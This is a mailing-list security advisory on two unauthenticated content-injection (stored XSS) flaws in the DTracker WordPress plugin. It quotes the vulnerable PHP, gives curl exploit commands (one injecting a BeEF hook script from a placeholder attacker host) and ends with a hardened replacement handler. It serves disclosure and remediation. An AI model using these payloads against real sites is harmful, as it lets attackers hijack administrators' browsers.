Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
Date: Mon, 20 Mar 2017 20:22:09 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Two Content Injection vulnerabilities in Wordpress Plugin DTracker v1.5

Title: Two Content Injection vulnerabilities in Wordpress Plugin DTracker v1.5
Author: Larry W. Cashdollar, @_larry0
Date: 2017-03-08
CVE-ID: CVE-2017-1002006, CVE-2017-1002007
Download Site: https://wordpress.org/plugins/dtracker/
Vendor: https://profiles.wordpress.org/dijo/
Vendor Notified: 2017-03-09
Vendor Contact: plugins@...dpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=186
Description: Tracks the details of the users downloading PDF files from a WordPress site.
Vulnerability:
CVE-2017-1002006:
In file dtracker/save_contact.php

The script does not check that the user is authorized before writing contact data into the wp_contacts table. A simple POST request will allow any user to add new contacts. A malicious user could store JavaScript in the database that is later executed in the browser of the admin user.

	// Request parameters are used as-is: no nonce, capability or input validation precedes this
	$name       = $_POST['name'];
	$company    = $_POST['company'];
	$phone      = $_POST['phone'];
	$country    = $_POST['country'];
	$contact_id = $_POST['contact_id'];

	$table = 'wp_contacts';
	$data  = array(
		'name'    => $name,
		'company' => $company,
		'phone'   => $phone,
		'country' => $country,
	);
	$where = array(
		'id' => $contact_id
	);

	$wpdb->flush();

	$wpdb->update( $table, $data, $where ); //Update the Contact

CVE-2017-1002007:
In file dtracker/save_mail.php

The script does not check that the user is authorized before writing new e-mail addresses into the wp_contacts table. A simple POST request will allow any user to add new contacts. A malicious user could store JavaScript in the database that is later executed in the browser of the admin user.


	// The submitted address is stored without validation or escaping
	$email = $_POST['email'];
	$time  = date('Y-m-d H:i:s');
	$ip    = $_SERVER['REMOTE_ADDR']; //get IP address of the visitor

	$table = "wp_contacts";
	$data  = array(
		'email' => $email,
		'time'  => $time,
		'ip'    => $ip
	);

	$wpdb->insert( $table, $data ); //Insert Values
	$contact_id = $wpdb->insert_id; //Get ID of the last inserted row
	$data['contactId'] = $contact_id;
	echo json_encode($data); //Pass the id to the JS

Exploit Code:

$ curl --data "email=\"><script>alert(1);</script>" http://example.com/wordpress/wp-content/plugins/dtracker/save_mail.php
{"email":"\\\"><script>alert(1);<\/script>","time":"2017-03-09 00:54:06","ip":"example.com","contactId":10577}

Or better yet, inject a BeEF hook:

$ curl --data 'email="><script src=http://BeEF_Host:3000/hook.js></script>' http://example.com/wordpress/wp-content/plugins/dtracker/save_mail.php
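A hardened handler for the save_mail.php path, added here as an example and not the plugin author's code: it moves the endpoint behind admin-ajax.php, requires a nonce, validates the address with WordPress' own helpers, declares column formats on the insert, and escapes on output in the admin listing. The action name dtracker_save_mail, the _wpnonce field and the listing helper are assumptions; the nopriv hook is kept because the plugin's purpose (tracking visitors who download PDFs) implies anonymous submissions.

```php
<?php
// Added example (not the plugin's code): hardened replacement for save_mail.php.
// Hook names, nonce action and the row renderer below are assumptions.
add_action( 'wp_ajax_dtracker_save_mail',        'dtracker_save_mail' );
add_action( 'wp_ajax_nopriv_dtracker_save_mail', 'dtracker_save_mail' );

function dtracker_save_mail() {
    global $wpdb;

    // 1. The request must carry a nonce issued by the page that rendered the form,
    //    so arbitrary cross-site POSTs like the curl requests above are rejected.
    $nonce = isset( $_POST['_wpnonce'] ) ? sanitize_text_field( wp_unslash( $_POST['_wpnonce'] ) ) : '';
    if ( ! wp_verify_nonce( $nonce, 'dtracker_save_mail' ) ) {
        wp_send_json_error( array( 'message' => 'invalid request' ), 403 );
    }

    // 2. Validate and sanitize input: only a syntactically valid address is stored,
    //    so a "><script> payload never reaches the table.
    $email = isset( $_POST['email'] ) ? sanitize_email( wp_unslash( $_POST['email'] ) ) : '';
    if ( '' === $email || ! is_email( $email ) ) {
        wp_send_json_error( array( 'message' => 'invalid email' ), 400 );
    }

    // 3. Use the site's table prefix instead of a hard-coded wp_ and declare
    //    column formats so every value is bound as a string.
    $ip   = isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : '';
    $data = array(
        'email' => $email,
        'time'  => current_time( 'mysql' ),
        'ip'    => $ip,
    );
    if ( false === $wpdb->insert( $wpdb->prefix . 'contacts', $data, array( '%s', '%s', '%s' ) ) ) {
        wp_send_json_error( array( 'message' => 'database error' ), 500 );
    }

    // 4. Return only the id; echoing the submitted fields back is unnecessary.
    wp_send_json_success( array( 'contactId' => (int) $wpdb->insert_id ) );
}

// In the admin screen that lists contacts, escape on output as well, so a value
// that reached the table by any other path cannot run in the administrator's browser.
function dtracker_render_contact_row( $row ) {
    printf(
        '<tr><td>%s</td><td>%s</td><td>%s</td></tr>',
        esc_html( $row->email ), esc_html( $row->time ), esc_html( $row->ip )
    );
}
```

The directly reachable save_mail.php would also have to be removed (or made to exit when ABSPATH is undefined), since otherwise the requests shown above still reach the old code.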
